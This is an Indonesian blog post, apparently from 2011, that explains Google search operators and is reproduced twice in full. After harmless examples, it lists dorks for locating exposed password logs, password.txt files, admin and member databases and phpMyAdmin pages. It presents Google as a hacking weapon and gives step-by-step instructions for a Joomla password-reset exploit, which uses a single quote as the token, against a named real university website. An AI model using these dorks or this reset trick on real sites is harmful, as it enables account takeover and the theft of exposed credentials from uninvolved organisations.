on the way...
Senin, 10 Januari 2011
Minggu, 09 Januari 2011
0 Google Dork
Type-type dalam penggunaannya ada beberapa macam diantaranya:
intitle
allintitle
(Mencari judul/title pada suatu web)
inurl
allinurl
(Mencari suatu string yang terdapat pada url)
filetype
(Mencari suatu file secara lebih spesifik)
(http://www.google.c.id/help/faq_filetypes.html)
allintext
(Mencari suatu nilai string dalam suatu web)
site
(Mencari pada web tertentu)
link
(Mencari web2 yang mempunyai link pada web yang di pilih)
contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan
sja di google seperti ini
intitle:"index of/avenged"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan
mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web
terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk
mencari sebuah title yang berkaitan dengan kata ( index of ), llu
ketikan kata aveng*d agar google mencari database file tentg kata-kata
aveng*d
Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di
google seperti ini
intitle:"index of" "skripsi" site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id
dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc
sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan
menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/
mencari url yg berkaitan dengan kata option=com_user
ketikan di google >>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web indonesia
saja,
http://www.lbifib.ui.ac.id/index.php?opt...view=login
lalu hapus url pada (/index.php?option=com_user&view=login) dan ganti
url tersebut menjadi
http://www.lbifib.ui.ac.id/index.php?
option=com_user&view=reset&layout=confirm
lalu ketikan token '
dan apa hasilnya biggrin password sudah bisa kita reset ulang,,,,
sekrang tiggal bgaimana kita meng-applikasikan kata tersebut agar bisa
mencari celah pada suatu url web,,,
intitle
allintitle
(Mencari judul/title pada suatu web)
inurl
allinurl
(Mencari suatu string yang terdapat pada url)
filetype
(Mencari suatu file secara lebih spesifik)
(http://www.google.c.id/help/faq_filetypes.html)
allintext
(Mencari suatu nilai string dalam suatu web)
site
(Mencari pada web tertentu)
link
(Mencari web2 yang mempunyai link pada web yang di pilih)
contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan
sja di google seperti ini
intitle:"index of/avenged"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan
mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web
terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk
mencari sebuah title yang berkaitan dengan kata ( index of ), llu
ketikan kata aveng*d agar google mencari database file tentg kata-kata
aveng*d
Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di
google seperti ini
intitle:"index of" "skripsi" site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id
dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc
sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan
menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/
mencari url yg berkaitan dengan kata option=com_user
ketikan di google >>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web indonesia
saja,
http://www.lbifib.ui.ac.id/index.php?opt...view=login
lalu hapus url pada (/index.php?option=com_user&view=login) dan ganti
url tersebut menjadi
http://www.lbifib.ui.ac.id/index.php?
option=com_user&view=reset&layout=confirm
lalu ketikan token '
dan apa hasilnya biggrin password sudah bisa kita reset ulang,,,,
sekrang tiggal bgaimana kita meng-applikasikan kata tersebut agar bisa
mencari celah pada suatu url web,,,
